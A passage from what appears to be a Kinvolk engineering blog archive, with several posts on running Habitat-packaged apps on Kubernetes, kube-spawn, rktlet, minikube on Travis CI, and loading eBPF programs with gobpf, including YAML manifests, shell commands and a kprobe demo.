Create it with:

$ gcloud projects create habitat-on-kubernetes

We will then need to enable the “compute API” for the project we’ve just created. This API allows us to create clusters and containers.

$ gcloud service-management enable --project habitat-on-kubernetes

We also need to enable billing for our project, since we’re going to spin up some nodes in a cluster:

$ gcloud beta billing projects link habitat-on-kubernetes --billing-account=$your-billing-id

Now we’re ready to create the cluster. We will have to choose a name and a zone in which the cluster will reside. You can list existing zones with:

$ gcloud compute zones list --project habitat-on-kubernetes

The following command sets the zone to “europe-west1-b” and the cluster name to “habitat-demo-cluster”. It can take several minutes to complete.

$ gcloud container clusters create habitat-demo-cluster --project habitat-on-kubernetes --zone europe-west1-b

Deploying the operator

The next step is to deploy the Habitat operator. This is a component that runs in your cluster and reacts to the creation and deletion of Habitat custom objects by creating, updating or deleting resources in the cluster. Like other Kubernetes objects, the operator is deployed with a YAML manifest file, shown below:

apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: habitat-operator
spec:
  replicas: 1
  template:
    metadata:
      labels:
        name: habitat-operator
    spec:
      containers:
      - name: habitat-operator
        image: kinvolk/habitat-operator:v0.2.0

From the root of our demo application, we can then deploy the operator with:

$ kubectl create -f kubernetes/habitat-operator.yml

Deploying the demo application

With that done, we can finally deploy our demo application:

kind: Habitat
metadata:
  name: habitat-demo-counter
spec:
  image: kinvolk/habitat-demo-counter
  count: 1
  service:
    topology: standalone
---
apiVersion: v1
kind: Service
metadata:
  name: front
spec:
  selector:
    habitat-name: habitat-demo-counter
  type: LoadBalancer
  ports:
  - name: web
    targetPort: 8000
    port: 8000
    protocol: TCP

Just run the following command:

$ kubectl create -f kubernetes/habitat-demo-counter.yml

We can monitor the status of our deployment with kubectl get pod -w. Once all pods are in the “Running” state, our application is fully deployed and ready to interact with.

Let’s find out the public IP address of our application by running kubectl get services front. The IP will be listed under the column “External IP”.

Let’s test it out by going to the service’s IP and port 8000, where we should see the app’s landing page, with the view counter. The counter increases every time we refresh the page, and can be reset with the “Reset” button.

To see this in action, watch the video below.

The Ruby web application has been packaged with Habitat, and is now running as a Habitat service in a Docker container deployed on Kubernetes. Congratulations!

What's new in kube-spawn

There’s been a number of changes in kube-spawn since we announced it.

The main focus of the recent developments was improving the CLI, supporting several clusters running in parallel, and enabling developers to test Kubernetes patches easily. In addition, we’ve added a bunch of documentation, improved error messages and, of course, fixed a lot of bugs.

CLI redesign

We’ve completely redesigned the CLI commands used to interact with kube-spawn. You can now use create to generate the cluster environment, and then start to boot and provision the cluster. The convenience up command does the two steps in one so you can quickly get a cluster with only one command.

Once a cluster is up and running, you can use stop to shut it down and keep it around to start again later, or restart to stop and start the cluster in one go.

The command destroy will take a cluster in the stopped or running state and remove it completely, including any disk space the cluster was using.

The following diagram provides a visualization of the CLI workflow.

Multi-cluster support

Previously, users could only run one cluster at a time. With the new --cluster-name flag, running multiple clusters in parallel is now possible.

All the CLI operations can take --cluster-name to specify which cluster you’re referring to. To see your currently created clusters, a new command list was added to kube-spawn.

This is especially useful when you want to test how your app behaves in different Kubernetes versions or, as a Kubernetes developer, when you made a change to Kubernetes itself and want to compare a cluster without changes and another with your change side-by-side. Which leads us to the next feature.

Dev workflow support

kube-spawn makes testing changes to Kubernetes really easy. You just need to build your Hyperkube Docker image with a particular VERSION tag. Once that’s built, you need to start kube-spawn with the --dev flag, and set --hyperkube-tag to the same name you used when building the Hyperkube image.

Taking advantage of the aforementioned multi-cluster support, you can build current Kubernetes master, start a cluster with --cluster-name=master, build Kubernetes with your patch, and start another cluster with --cluster-name=fix. You’ll then have two clusters to check how your patch behaves in comparison with an unpatched Kubernetes.

You can find a detailed step-by-step example of this in kube-spawn’s documentation.

kube-spawn, a certified Kubernetes distribution

certified kubernetes

We’ve successfully run the Kubernetes Software Conformance Certification tests based on Sonobuoy for Kubernetes v1.7 and v1.8. We’ve submitted the results to CNCF and they merged our PRs. This means kube-spawn is now a certified Kubernetes distribution.


With the above additions, we feel like kube-spawn is one of the best tools for developing on Linux with, and on, Kubernetes.

If you want to try it out, we’ve just released kube-spawn v0.2.1. We look forward to your feedback and welcome issues or PRs on the GitHub project.

Introducing the Habitat Kubernetes Exporter

At Kinvolk, we’ve been working with the Habitat team at Chef to make Habitat-packaged applications run well in Kubernetes.

The first step on this journey was the Habitat operator for Kubernetes which my colleague, Lili, already wrote about. The second part of this project —the focus of this post— is to make it easier to deploy Habitat apps to a Kubernetes cluster that is running the Habitat operator.

Exporting to Kubernetes

To that end, we’d like to introduce the Habitat Kubernetes exporter.

The Kubernetes exporter is an additional command line subcommand to the standard Habitat CLI interface. It leverages the existing Docker image export functionality and, additionally, generates a Kubernetes manifest that can be deployed to a Kubernetes cluster running the Habitat operator.

The command line for the Kubernetes exporter is:

$ hab pkg export kubernetes ORIGIN/NAME

Run hab pkg export kubernetes --help to see the full list of available options and general help.


Let’s take a look at the Habitat Kubernetes exporter in action.

As you can see, the Habitat Kubernetes exporter helps you to deploy your applications that are built and packaged with Habitat on a Kubernetes cluster by generating the needed manifest files.

More to come

We’ve got more exciting ideas for making Habitat and Habitat Builder work even more seamlessly with Kubernetes. So stay tuned for more.

Kubernetes The Hab Way

What does a Kubernetes setup the Hab(itat) way look like? In this blog post we will explore how to use Habitat’s application automation to set up and run a Kubernetes cluster from scratch, based on the well-known “Kubernetes The Hard Way” manual by Kelsey Hightower.

A detailed README with step-by-step instructions and a Vagrant environment can be found in the Kubernetes The Hab Way repository.

Kubernetes Core Components

To recap, let’s have a brief look at the building blocks of a Kubernetes cluster and their purpose:

  • etcd, the distributed key value store used by Kubernetes for persistent storage,
  • the API server, the API frontend to the cluster’s shared state,
  • the controller manager, responsible for ensuring the cluster reflects the configured state,
  • the scheduler, responsible for distributing workloads on the cluster,
  • the network proxy, for service network configuration on cluster nodes and
  • the kubelet, the “primary node agent”.

For each of the components above, core packages are now available upstream. Alternatively, you can fork the upstream core plans or build your own packages from scratch. Habitat Studio makes this process easy.

By packaging Kubernetes components with Habitat, we can use Habitat’s application delivery pipeline and service automation, and benefit from them as with any other Habitat-managed application.

Deploying services

Deployment of all services follows the same pattern: first loading the service and then applying custom configuration. Let’s have a look at the setup of etcd to understand how this works in detail:

To load the service with default configuration, we use the hab sup subcommand:

$ sudo hab sup load core/etcd --topology leader

Then we apply custom configuration. For Kubernetes we want to use client and peer certificate authentication instead of autogenerated SSL certificates. We have to upload the certificate files and change the corresponding etcd configuration parameters:

$ for f in /vagrant/certificates/{etcd.pem,etcd-key.pem,ca.pem}; do sudo hab file upload etcd.default 1 "${f}"; done

$ cat /vagrant/config/svc-etcd.toml
etcd-auto-tls = "false"
etcd-http-proto = "https"

etcd-client-cert-auth = "true"
etcd-cert-file = "files/etcd.pem"
etcd-key-file = "files/etcd-key.pem"
etcd-trusted-ca-file = "files/ca.pem"

etcd-peer-client-cert-auth = "true"
etcd-peer-cert-file = "files/etcd.pem"
etcd-peer-key-file = "files/etcd-key.pem"
etcd-peer-trusted-ca-file = "files/ca.pem"

$ sudo hab config apply etcd.default 1 /vagrant/config/svc-etcd.toml

Since service configuration with Habitat is per service group, we don’t have to do this for each member instance of etcd. The Habitat supervisor will distribute the configuration and files to all instances and reload the service automatically.

If you follow the step-by-step setup on GitHub, you will notice that the same pattern applies to all components.

Per-instance configuration

Sometimes, though, each instance of a service requires custom configuration parameters or files. With Habitat, all configuration is shared within the service group, and it’s not possible to provide configuration to a single instance only. In this case we have to fall back to “traditional infrastructure provisioning”. Also, uploaded files are limited to 4096 bytes, which is sometimes not enough.

In the Kubernetes setup, each kubelet needs a custom kubeconfig, CNI configuration, and a personal node certificate. For this we create a directory (/var/lib/kubelet-config/) and place the files there before loading the service. The Habitat service configuration then points to files in that directory:

$ cat config/svc-kubelet.toml
kubeconfig = "/var/lib/kubelet-config/kubeconfig"

client-ca-file = "/var/lib/kubelet-config/ca.pem"

tls-cert-file = "/var/lib/kubelet-config/node.pem"
tls-private-key-file = "/var/lib/kubelet-config/node-key.pem"

cni-conf-dir = "/var/lib/kubelet-config/cni/"

Automatic service updates

If desired, Habitat services can be automatically updated by the Supervisor once a new version is published on a channel, by loading a service with --strategy set to either at-once or rolling. By default, automatic updates are disabled. With this, Kubernetes components could be made self-updating, an interesting topic to explore in the future.


We have demonstrated how Habitat can be used to build, set up, and run Kubernetes cluster components in the same way as any other application.

If you are interested in using Habitat to manage your Kubernetes cluster, keep an eye on this blog and the “Kubernetes The Hab Way” repo for future updates and improvements. Also, have a look at the Habitat operator, a Kubernetes operator for Habitat services, that allows you to run Habitat services on Kubernetes.

Announcing the Initial Release of rktlet, the rkt CRI Implementation

We are happy to announce the initial release of rktlet, the rkt implementation of the Kubernetes Container Runtime Interface. This is a preview release, and is not meant for production workloads.

When using rktlet, all container workloads are run with the rkt container runtime.

About rkt

The rkt container runtime is unique amongst container runtimes in that, once rkt is finished setting up the pod and starting the application, no rkt code is left running. rkt also takes a security-first approach, not allowing insecure functionality unless the user explicitly disables security features. And rkt is pod-native, matching ideally with the Kubernetes concept of pods. In addition, rkt prefers to integrate and drive improvements into existing tools, rather than reinvent things. And lastly, rkt allows for running apps in various isolation environments — container, VM or host/none.

rkt support in Kubernetes

With this initial release of rktlet, rkt currently has two Kubernetes implementations. Original rkt support for Kubernetes was introduced in Kubernetes version 1.3. That implementation — which goes by the name rktnetes — resides in the core of Kubernetes. Just as rkt itself kickstarted the drive towards standards in containers, this original rkt integration also spurred the introduction of a standard interface within Kubernetes to enable adding support for other container runtimes. This interface is known as the Kubernetes Container Runtime Interface (CRI).

With the Kubernetes CRI, container runtimes have a clear path towards integrating with Kubernetes. rktlet is the rkt implementation of that interface.

Project goals

The goal is to make rktlet the preferred means to run workloads with rkt in Kubernetes. But companies like Blablacar rely on the Kubernetes-internal implementation of rkt to run their infrastructure. Thus, we cannot just remove that implementation without having a viable alternative.

rktlet currently passes 129 of the 145 Kubernetes end-to-end conformance tests. We aim for full compliance. Later in this article, we’ll look at what work remains to get there.

Once rktlet is ready, the plan is to deprecate the rkt implementation in the core of Kubernetes.

How rktlet works

rktlet is a daemon that communicates with the kubelet via gRPC. The CRI is the interface by which kubelet and rktlet communicate. The main CRI methods are

  • RunPodSandbox(),
  • PodSandboxStatus(),
  • CreateContainer(),
  • StartContainer(),
  • StopPodSandbox(),
  • ListContainers(),
  • etc.

These methods handle lifecycle management and gather state.

To create pods, rktlet creates a transient systemd service using systemd-run with the appropriate rkt command line invocation. Subsequent actions like adding and removing containers to and from the pods, respectively, are done by calling the rkt command line tool.

The following component diagram provides a visualization of what we’ve described.

To try out rktlet, follow the Getting Started guide.

Driving rkt development

Work on rktlet has spurred a couple of new features inside of rkt itself, which we’ll take a moment to highlight.

Pod manipulation

rkt has always been pod-native, but the pods themselves were immutable. The original design did not allow for actions such as starting, stopping, or adding apps to a pod. These features were added to rkt in order to be CRI conformant. This work is described in the app level API document.

Logging and attaching

Historically, apps in rkt have offloaded logging to a sidecar service — by default systemd-journald — that multiplexes their output to the outside world. The sidecar service handled logging, and interactive applications reused a parent TTY.

But the CRI defines a logging format that is plaintext whereas systemd-journald’s output format is binary. Moreover, Kubernetes has an attaching feature that couldn’t be implemented with the old design.

To solve these problems, a component called iottymux was implemented. When enabled, it replaces systemd-journald completely, providing app logs in a CRI-compatible format and the logic needed for the attach feature.

For a more detailed description of this design, check out the log attach design document.

Future work for rktlet

rktlet still needs work before it’s ready for production workloads and 100% CRI compliant. Some of the work that still needs to be done is…

Join the team

If you’d like to join the effort, rktlet offers ample chances to get involved. Ongoing work is discussed in the #sig-node-rkt Kubernetes Slack channel. If you’re at Kubecon North America in Austin, please come by the rkt salon to talk about rkt and rktlet.


Thanks to all those that have contributed to rktlet and to CoreOS, Blablacar, CNCF and our team at Kinvolk for supporting its development.

Running Kubernetes on Travis CI with minikube

Running Kubernetes on Travis CI is not straightforward: most methods of setting up a cluster need to create resources on AWS or another cloud provider, and setting up VMs is not possible either, as Travis CI doesn’t allow nested virtualization. This post explains how to use minikube without additional resources, in a few simple steps.

Our use case

As we are currently working with Chef on a project to integrate Habitat with Kubernetes (the Habitat Operator), we needed a way to run the end-to-end tests on every pull request. Locally we use minikube, a tool to set up a local one-node Kubernetes cluster for development, or, when we need a multi-node cluster, kube-spawn. For automated CI tests, however, we currently only require a single-node setup. So we decided to use minikube to be able to easily catch any failed tests, and to debug and reproduce those locally.

Typically minikube requires a virtual machine to set up Kubernetes. One day this tweet was shared in our Slack. It turns out that minikube has a not-so-well-documented way of running Kubernetes with no need for virtualization: it sets up localkube, a single binary for Kubernetes that is executed in a Docker container, and Travis CI already has Docker support. There is a warning against running this locally, but since we only use it on Travis CI, in an ephemeral environment, we concluded that this is an acceptable use case.

The setup

So this is what our setup looks like. Following is the example .travis.yml file:

sudo: required

env:
- CHANGE_MINIKUBE_NONE_USER=true

before_script:
- curl -Lo kubectl && chmod +x kubectl && sudo mv kubectl /usr/local/bin/
- curl -Lo minikube && chmod +x minikube && sudo mv minikube /usr/local/bin/
- sudo minikube start --vm-driver=none --kubernetes-version=v1.7.0
- minikube update-context
- JSONPATH='{range .items[*]}{@.metadata.name}:{range @.status.conditions[*]}{@.type}={@.status};{end}{end}'; until kubectl get nodes -o jsonpath="$JSONPATH" 2>&1 | grep -q "Ready=True"; do sleep 1; done

How it works

First, it installs kubectl, which is a requirement of minikube. The need for sudo: required comes from minikube starting processes that must run as root. When using the none driver, the generated kubectl config and credentials would otherwise be owned by root and placed in the root user’s home directory; with the environment variable CHANGE_MINIKUBE_NONE_USER set, minikube automatically moves the config files to the appropriate place and adjusts their permissions. The none driver then does the heavy lifting of setting up localkube on the host. Next, the kubeconfig is updated with minikube update-context. And lastly, we wait for Kubernetes to be up and ready.


This work is already being used in the Habitat Operator. For a simple live example setup have a look at this repo. If you have any questions feel free to ping me on twitter @LiliCosic.

Follow Kinvolk on twitter to get notified when new blog posts go live.

Habitat Operator - Running Habitat Services with Kubernetes

For the last few months, we’ve been working with the Habitat team at Chef to make Habitat-packaged applications run well in Kubernetes. The result of this collaboration is the Habitat Operator, a Kubernetes controller used to deploy, configure and manage applications packaged with Habitat inside of Kubernetes. This article will give an overview of that work — particularly the issues to address, solutions to those issues, and future work.

Habitat Overview

For the uninitiated, Habitat is a project designed to address building, deploying and running applications.

Building applications

Applications are built from shell scripts known as “plans” which describe how to build the application, and may optionally include configurations files and lifecycle hooks. From the information in the plan, Habitat can create a package of the application.

Deploy applications

In order to run an application with a container runtime like Docker or rkt, Habitat supports exporting packages to a Docker container image. You can then upload the container image to a registry and use it to deploy applications to a container orchestration system like Kubernetes.

Running applications

Applications packaged with Habitat — hereafter referred to simply as applications — support a number of runtime features.

These features are available because all Habitat applications run under a supervisor process, the Supervisor. The Supervisor takes care of restarting, reconfiguring and gracefully terminating services. Multiple instances of an application can run with their Supervisors communicating via a gossip protocol; Supervisors can connect to form a ring and establish service groups for sharing configuration data and establishing topologies.

Integration with Kubernetes

Many of the features that Habitat provides overlap with features that are provided in Kubernetes. Where there is overlap, the Habitat Operator tries to translate, or defer, to the Kubernetes-native mechanism. One design goal of the Habitat Operator is to allow Kubernetes users to use the Kubernetes CLI without fear that Habitat applications will become out of sync. For example, update strategies are a core feature of Kubernetes and should be handled by Kubernetes.

For the features that do not overlap — such as topologies and application binding — the Habitat Operator ensures that these work within Kubernetes.

Joining the ring

One of the fundamental challenges we faced when conforming Habitat to Kubernetes was forming and joining a ring. Habitat uses the --peer flag, which is passed the IP address of a previously started Supervisor. But in the Kubernetes world this is not possible, as all pods need to be started with the exact same command line flags. To make this work within Kubernetes, we implemented a new flag in Habitat itself, --peer-watch-file. This flag takes a file containing a list of one or more IP addresses of peers in the service group the Supervisor would like to join. Habitat uses this information to form the ring between the Supervisors. The Habitat Operator implements this using a Kubernetes ConfigMap which is mounted into each pod.

Initial Configuration

Habitat allows for drawing configuration information from different sources. One of them is a user.toml file which is used for initial configuration and is not gossiped within the ring. Because there can be sensitive data in configuration files, we use Kubernetes Secrets for all configuration data. The Habitat Operator mounts configuration files in the place where Habitat expects it to be found and the application automatically picks up this configuration as it normally would. This mechanism will also be reused to support configuration updates in the future.


One of these non-overlapping features is support for the two different topologies available in Habitat. The standalone topology — the default topology in Habitat — is used for applications that are independent of one another. With the leader/follower topology, the Supervisor handles leader election over the ring before the application starts. For this topology, three or more instances of an application must be available for a successful leader election to take place.

Ring encryption

A security feature of Habitat that we brought into the operator is securing the ring by encrypting all communications across the network.

Application binding

We also added the ability to do runtime binding, meaning that applications form a producer/consumer relationship at application start. The producer exports the configuration and the consumer, through the Supervisor ring, consumes that information. You can learn more about that in the demo below:

Future plans for Habitat operator

The Habitat Operator is in heavy development and we’re excited about the features that we have planned for the next months.

Export to Kubernetes

We’ve already started work on an exporter for Kubernetes. This will allow you to export an application packaged with Habitat to a Docker image, along with a generated manifest file that can be used to deploy directly to Kubernetes.

Dynamic configuration

As mentioned above, we are planning to extend the initial configuration logic and use it for configuration updates as well. This work should land in Habitat very soon. With Habitat applications, configuration changes can be made without restarting pods. The behaviour for configuration updates is defined in the application’s Habitat plan.

Further Kubernetes integration and demos

We’re also looking into exporting to Helm charts in the near future. This could allow for bringing a large collection of Habitat-packaged applications to Kubernetes.

Another area to explore is integration between the Habitat Builder and Kubernetes. The ability to automatically recompile applications, export images, and deploy to Kubernetes when dependencies are updated could bring great benefits to Habitat and Kubernetes users alike.


Please take the operator for a spin here. The first release is now available. All you need is an application packaged with Habitat and exported as a Docker image; that functionality is already available in Habitat itself.

Note: The Habitat operator is compatible with Habitat version 0.36.0 onwards. If you have any questions feel free to ask on the #kubernetes channel in Habitat slack or open an issue on the Habitat operator.


An update on gobpf - ELF loading, uprobes, more program types

Gophers by Ashley McNamara, Ponies by Deirdré Straughan - CC BY-NC-SA 4.0

Almost a year ago we introduced gobpf, a Go library to load and use eBPF programs from Go applications. Today we would like to give you a quick update on the changes and features added since then (i.e. the highlights of git log --oneline --no-merges --since="November 30th 2016" master).

Load BPF programs from ELF object files

With commit 869e637, gobpf was split into two subpackages (gobpf/bcc and gobpf/elf) and learned to load BPF programs from ELF object files. This allows users to pre-build their programs with clang/LLVM and its BPF backend as an alternative to using the BPF Compiler Collection.

One project where we at Kinvolk used pre-built ELF objects is the TCP tracer that we wrote for Weave Scope. Putting the program into the library allows us to go get and vendor the tracer as any other Go dependency.

Another important result of using the ELF loading mechanism is that the Scope container images are much smaller, as bcc and clang are not included and don’t add to the container image size.

Let’s see how this is done in practice by building a demo program to log open(2) syscalls to the ftrace trace_pipe:

// program.c

#include <linux/kconfig.h>
#include <linux/bpf.h>

#include <uapi/linux/ptrace.h>

// definitions of bpf helper functions we need, as found in

#define SEC(NAME) __attribute__((section(NAME), used))

#define PT_REGS_PARM1(x) ((x)->di)

static int (*bpf_probe_read)(void *dst, int size, void *unsafe_ptr) =
        (void *) BPF_FUNC_probe_read;
static int (*bpf_trace_printk)(const char *fmt, int fmt_size, ...) =
        (void *) BPF_FUNC_trace_printk;

#define printt(fmt, ...)                                                   \
        ({                                                                 \
                char ____fmt[] = fmt;                                      \
                bpf_trace_printk(____fmt, sizeof(____fmt), ##__VA_ARGS__); \
        })

// the kprobe

SEC("kprobe/SyS_open")
int kprobe__sys_open(struct pt_regs *ctx)
{
        char filename[256];

        bpf_probe_read(filename, sizeof(filename), (void *)PT_REGS_PARM1(ctx));

        printt("open(%s)\n", filename);

        return 0;
}

char _license[] SEC("license") = "GPL";
// this number will be interpreted by the elf loader
// to set the current running kernel version
__u32 _version SEC("version") = 0xFFFFFFFE;

On a Debian system, the corresponding Makefile could look like this:

# Makefile
# …

uname=$(shell uname -r)

build:
	clang \
                -D__KERNEL__ \
                -O2 -emit-llvm -c program.c \
                -I /lib/modules/$(uname)/source/include \
                -I /lib/modules/$(uname)/source/arch/x86/include \
                -I /lib/modules/$(uname)/build/include \
                -I /lib/modules/$(uname)/build/arch/x86/include/generated \
                -o - | \
                llc -march=bpf -filetype=obj -o program.o

A small Go tool can then be used to load the object file and enable the kprobe with the help of gobpf:

// main.go

package main

import (
        "fmt"
        "os"
        "os/signal"

        ""
)

func main() {
        module := elf.NewModule("./program.o")
        if err := module.Load(nil); err != nil {
                fmt.Fprintf(os.Stderr, "Failed to load program: %v\n", err)
                os.Exit(1)
        }
        defer func() {
                if err := module.Close(); err != nil {
                        fmt.Fprintf(os.Stderr, "Failed to close program: %v\n", err)
                }
        }()

        if err := module.EnableKprobe("kprobe/SyS_open", 0); err != nil {
                fmt.Fprintf(os.Stderr, "Failed to enable kprobe: %v\n", err)
                os.Exit(1)
        }

        sig := make(chan os.Signal, 1)
        signal.Notify(sig, os.Interrupt, os.Kill)
        <-sig
}


Now every time a process uses open(2), the kprobe will log a message. Messages written with bpf_trace_printk can be seen in the trace_pipe “live trace”:

sudo cat /sys/kernel/debug/tracing/trace_pipe

With go-bindata it’s possible to bundle the compiled BPF program into the Go binary to build a single fat binary that can be shipped and installed conveniently.

Trace user-level functions with bcc and uprobes

Louis McCormack contributed support for uprobes in gobpf/bcc, and therefore it is now possible to trace user-level function calls. For example, to trace all readline() function calls from /bin/bash processes, you can run the bash_readline.go demo:

sudo -E go run ./examples/bcc/bash_readline/bash_readline.go

More supported program types for gobpf/elf

gobpf/elf learned to load programs of type TRACEPOINT, SOCKET_FILTER, CGROUP_SOCK and CGROUP_SKB:


Tracepoints

A program of type TRACEPOINT can be attached to any Linux tracepoint. Tracepoints in Linux are “a hook to call a function (probe) that you can provide at runtime.” A list of available tracepoints can be obtained with find /sys/kernel/debug/tracing/events -type d.

Socket filtering

Socket filtering is the mechanism used by tcpdump to retrieve packets matching an expression. With SOCKET_FILTER programs, we can filter data on a socket by attaching them with setsockopt(2).


Cgroups

CGROUP_SOCK and CGROUP_SKB can be used to load and use programs specific to a cgroup. CGROUP_SOCK programs “run any time a process in the cgroup opens an AF_INET or AF_INET6 socket” and can be used to enable socket modifications. CGROUP_SKB programs are similar to SOCKET_FILTER and are executed for each network packet with the purpose of cgroup specific network filtering and accounting.

Continuous integration

We have set up continuous integration and written about how we use custom rkt stage1 images to test against various kernel versions. At the time of writing, gobpf has elementary tests to verify that programs and their sections can be loaded on kernel versions 4.4, 4.9 and 4.10, but no thorough testing of all functionality and features yet (e.g. perf map polling).


Thanks to contributors and clients

In closing, we’d like to thank all those who have contributed to gobpf. We look forward to merging more commits from contributors and seeing how others make use of gobpf.

A special thanks goes to Weaveworks for funding the work from which gobpf was born. Continued contributions have been possible through other clients, for whom we are helping build products (WIP) that leverage gobpf.

Introducing kube-spawn: a tool to create local, multi-node Kubernetes clusters

kube-spawn is a tool to easily start a local, multi-node Kubernetes cluster on a Linux machine. While its original audience was mainly developers of Kubernetes, it’s turned into a tool that is great for just trying Kubernetes out and exploring. This article will give a general introduction to kube-spawn and show how to use it.


kube-spawn aims to become the easiest means of testing and fiddling with Kubernetes on Linux. We started the project because it is still rather painful to start a multi-node Kubernetes cluster on our development machines. And the tools that do provide this functionality generally do not reflect the environments that Kubernetes will eventually be running on, a full Linux OS.

Running a Kubernetes cluster with kube-spawn

So, without further ado, let’s start our cluster. With one command kube-spawn fetches the Container Linux image, prepares the nodes, and deploys the cluster. Note that you can also do these steps individually with machinectl pull-raw, and the kube-spawn setup and init subcommands. But the up subcommand does this all for us.

$ sudo GOPATH=$GOPATH CNI_PATH=$GOPATH/bin ./kube-spawn up --nodes=3

When that command completes, you’ll have a 3-node Kubernetes cluster. You’ll need to wait for the nodes to be ready before it’s useful.

$ export KUBECONFIG=$GOPATH/src/
$ kubectl get nodes
NAME           STATUS    AGE       VERSION
kube-spawn-0   Ready     1m        v1.7.0
kube-spawn-1   Ready     1m        v1.7.0
kube-spawn-2   Ready     1m        v1.7.0

Looks like all the nodes are ready. Let’s move on.

The demo app

In order to test that our cluster is working we’re going to deploy the microservices demo, Sock Shop, from our friends at Weaveworks. The Sock Shop is a complex microservices app that uses many components commonly found in real-world deployments. So it’s good to test that everything is working and gives us something more substantial to explore than a hello world app.

Cloning the demo app

To proceed, you’ll need to clone the microservices-demo repo and navigate to the deploy/kubernetes folder.

$ cd ~/repos
$ git clone sock-shop
$ cd sock-shop/deploy/kubernetes/

Deploying the demo app

Now that we have things in place, let’s deploy. We first need to create the sock-shop namespace that the deployment expects.

$ kubectl create namespace sock-shop
namespace "sock-shop" created

With that, we’ve got all we need to deploy the app.

$ kubectl create -f complete-demo.yaml
deployment "carts-db" created
service "carts-db" created
deployment "carts" created
service "carts" created
deployment "catalogue-db" created
service "catalogue-db" created
deployment "catalogue" created
service "catalogue" created
deployment "front-end" created
service "front-end" created
deployment "orders-db" created
service "orders-db" created
deployment "orders" created
service "orders" created
deployment "payment" created
service "payment" created
deployment "queue-master" created
service "queue-master" created
deployment "rabbitmq" created
service "rabbitmq" created
deployment "shipping" created
service "shipping" created
deployment "user-db" created
service "user-db" created
deployment "user" created
service "user" created

Once that completes, we still need to wait for all the pods to come up.

$ watch kubectl -n sock-shop get pods
NAME                            READY     STATUS    RESTARTS   AGE
carts-2469883122-nd0g1          1/1       Running   0          1m
carts-db-1721187500-392vt       1/1       Running   0          1m
catalogue-4293036822-d79cm      1/1       Running   0          1m
catalogue-db-1846494424-njq7h   1/1       Running   0          1m
front-end-2337481689-v8m2h      1/1       Running   0          1m
orders-733484335-mg0lh          1/1       Running   0          1m
orders-db-3728196820-9v07l      1/1       Running   0          1m
payment-3050936124-rgvjj        1/1       Running   0          1m
queue-master-2067646375-7xx9x   1/1       Running   0          1m
rabbitmq-241640118-8htht        1/1       Running   0          1m
shipping-2463450563-n47k7       1/1       Running   0          1m
user-1574605338-p1djk           1/1       Running   0          1m
user-db-3152184577-c8r1f        1/1       Running   0          1m

Accessing the sock shop

When they’re all ready, we have to find out which port and IP address to use to access the shop. For the port, let’s see which port the front-end service is using.

$ kubectl -n sock-shop get svc
NAME           CLUSTER-IP       EXTERNAL-IP   PORT(S)        AGE
carts    <none>        80/TCP         3m
carts-db    <none>        27017/TCP      3m
catalogue     <none>        80/TCP         3m
catalogue-db     <none>        3306/TCP       3m
front-end   <nodes>       80:30001/TCP   3m
orders   <none>        80/TCP         3m
orders-db   <none>        27017/TCP      3m
payment    <none>        80/TCP         3m
queue-master     <none>        80/TCP         3m
rabbitmq    <none>        5672/TCP       3m
shipping     <none>        80/TCP         3m
user      <none>        80/TCP         3m
user-db      <none>        27017/TCP      3m

Here we see that the front-end is exposed on port 30001 and that its external IP is listed as <nodes>. This means that we can access the front-end service using any worker node IP address on port 30001. machinectl gives us each node’s IP address.

$ machinectl
kube-spawn-0 container systemd-nspawn coreos 1492.1.0
kube-spawn-1 container systemd-nspawn coreos 1492.1.0
kube-spawn-2 container systemd-nspawn coreos 1492.1.0

Remember, the first node is the master node and all the others are worker nodes. So in our case, we can point our browser at either worker node’s IP address on port 30001 and should be greeted by a shop selling socks.

Stopping the cluster

Once you’re done with your sock purchases, you can stop the cluster.

$ sudo ./kube-spawn stop
2017/08/10 01:58:00 turning off machines [kube-spawn-0 kube-spawn-1 kube-spawn-2]...
2017/08/10 01:58:00 All nodes are stopped.

A guided demo

If you’d like a more guided tour, you’ll find it here.

As mentioned in the video, kube-spawn creates a .kube-spawn directory in the current directory where you’ll find several files and directories under the default directory. In order to not be constrained by the size of each OS Container, we mount each node’s /var/lib/docker directory here. In this way, we can make use of the host’s disk space. Also, we don’t currently have a clean command. So you can run rm -rf .kube-spawn/ if you want to completely clean up things.


We hope you find kube-spawn as useful as we do. For us, it’s the easiest way to test changes to Kubernetes or spin up a cluster to explore Kubernetes.

There are still lots of improvements (some very obvious) that can be made. PRs are very much welcome!

All Systems Go! - The Userspace Linux Conference

At Kinvolk we spend a lot of time working on and talking about the Linux userspace. We can regularly be found presenting our work at various events and discussing the details of our work with those who are interested. These events are usually either very generally about open source, or focused on a very specific technology, like containers, systemd, or ebpf. While these events are often awesome, and absolutely essential, they simply have a focus that is either too broad, or too specific.

What we felt was missing was an event focused on the Linux userspace itself, and less on the projects and products built on top, or the kernel below. This is the focus of All Systems Go! and why we are excited to be a part of it.

All Systems Go! is designed to be a community event. Tickets to All Systems Go! are affordable — starting at less than 30 EUR — and the event takes place during the weekend, making it more accessible to hobbyists and students. It’s also conveniently scheduled to fall between DockerCon EU in Copenhagen and Open Source Summit in Prague.


To make All Systems Go! work, we’ve got to make sure that we get the people to attend who are working at this layer of the system, and on the individual projects that make up the Linux userspace. As a start, we’ve invited a first round of speakers, who also happen to be the CFP selection committee. We’re very happy to welcome to the All Systems Go! team…

While we’re happy to have this initial group of speakers, what’s really going to make All Systems Go! awesome are all the others in the community who submit their proposals and offer their perspectives and voices.


Sponsors are crucial to open source community events. All Systems Go! is no different. In fact, sponsors are essential to keeping All Systems Go! an affordable and accessible event.

We will soon be announcing our first round of sponsors. If your organization would like to be amongst that group please have a look at our sponsorship prospectus and get in touch.

See you there!

We’re looking forward to welcoming the Linux userspace community to Berlin. Hope to see you there!

Using custom rkt stage1 images to test against various kernel versions


When writing software that is tightly coupled with the Linux kernel, it is necessary to test on multiple versions of the kernel. This is relatively easy to do locally with VMs, but when working on open-source code hosted on Github, one wants to make these tests a part of the project’s continuous integration (CI) system to ensure that each pull request runs the tests and passes before merging.

Most CI systems run tests inside containers and, very sensibly, use various security mechanisms to restrict what the code being tested can access. While this does not cause problems for most use cases, it does for us. It blocks certain syscalls that are needed to, say, test a container runtime like rkt, or load eBPF programs into the kernel for testing, like we need to do to test gobpf and tcptracer-bpf. It also doesn’t allow us to run virtual machines, which we need to be able to do to run tests on different versions of the kernel.

Finding a continuous integration service

While working on the rkt project, we did a survey of CI systems to find the ones that we could use to test rkt itself. Because of the above-stated requirements, it was clear that we needed one that gave us the option to run tests inside a virtual machine. This makes the list rather small; in fact, we were left with only SemaphoreCI.

